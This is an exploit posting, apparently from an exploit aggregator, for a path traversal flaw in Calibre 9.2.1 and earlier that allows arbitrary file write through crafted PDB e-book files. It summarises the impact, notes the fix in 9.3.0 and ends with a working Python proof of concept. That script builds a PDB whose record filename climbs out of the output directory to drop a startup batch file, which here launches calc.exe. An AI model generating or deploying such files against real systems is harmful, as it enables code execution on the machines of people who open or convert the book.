Share
## https://sploitus.com/exploit?id=PACKETSTORM:216159
=============================================================================================================================================
    | # Title     : Calibre โ‰ค 9.2.1 PDB File Path Traversal Vulnerability Leading to Arbitrary File Write                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://manual.calibre-ebook.com/fr/tutorials.html                                                                          |
    =============================================================================================================================================
    
    [+] Summary    : Calibre is a cross-platform e-book management application used for viewing, converting, editing, and organizing digital books.
    
    Versions 9.2.1 and below are vulnerable to a Path Traversal flaw in the PDB file parser, affecting both the 132-byte and 202-byte header variants of the PDB reader implementation.
    
    The vulnerability allows a specially crafted PDB file to embed directory traversal sequences (such as ../) within internal filename fields. When processed by the application, these filenames are not properly sanitized before being written to disk.
    
    [+] As a result, an attacker can:
    
    Write arbitrary files anywhere the user has write permissions
    
    Use arbitrary file extensions
    
    Control the full file content
    
    Silently overwrite existing files (files are written in wb mode)
    
    [+] Impact :
    
    This issue may lead to:
    
    Arbitrary File Write
    
    Local Code Execution (depending on file placement and execution context)
    
    Denial of Service (DoS) through corruption of critical user files
    
    Overwriting configuration, startup, or application data files
    
    The vulnerability has been addressed and fixed in version 9.3.0.
    
    Users are strongly advised to upgrade to version 9.3.0 or later to mitigate the issue.
    
    [+] POC   :  
    
    import struct
    import os
    
    def generate_exploit_pdb(filename="exploit.pdb"):
    
        payload_code = b'@echo off\r\ncalc.exe\r\n'
    
        traversal_path = b'../../../../startup_exploit.bat'
    
        image_record = bytearray()
        image_record += b'\x00' * 4
        image_record += traversal_path.ljust(32, b'\x00')
        image_record += b'\x00' * 26
        image_record += payload_code
    
        header = bytearray(132)
        struct.pack_into('>H', header, 0, 2)     
        struct.pack_into('>H', header, 12, 2)    
        struct.pack_into('>H', header, 20, 1)    
        
        dummy_text = b'<html><body><h1>Hello World</h1></body></html>'
        
        with open(filename, 'wb') as f:
    
            f.write(b'Exploit Book'.ljust(32, b'\x00')) 
            f.write(b'\x00' * 46) # Padding to reach the records area
            f.write(header)
            f.write(dummy_text)
            f.write(image_record)
    
        print(f"[+] Exploit file created successfully: {filename}")
        print(f"[*] Target path upon conversion: {traversal_path.decode()}")
    
    if __name__ == "__main__":
        generate_exploit_pdb()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================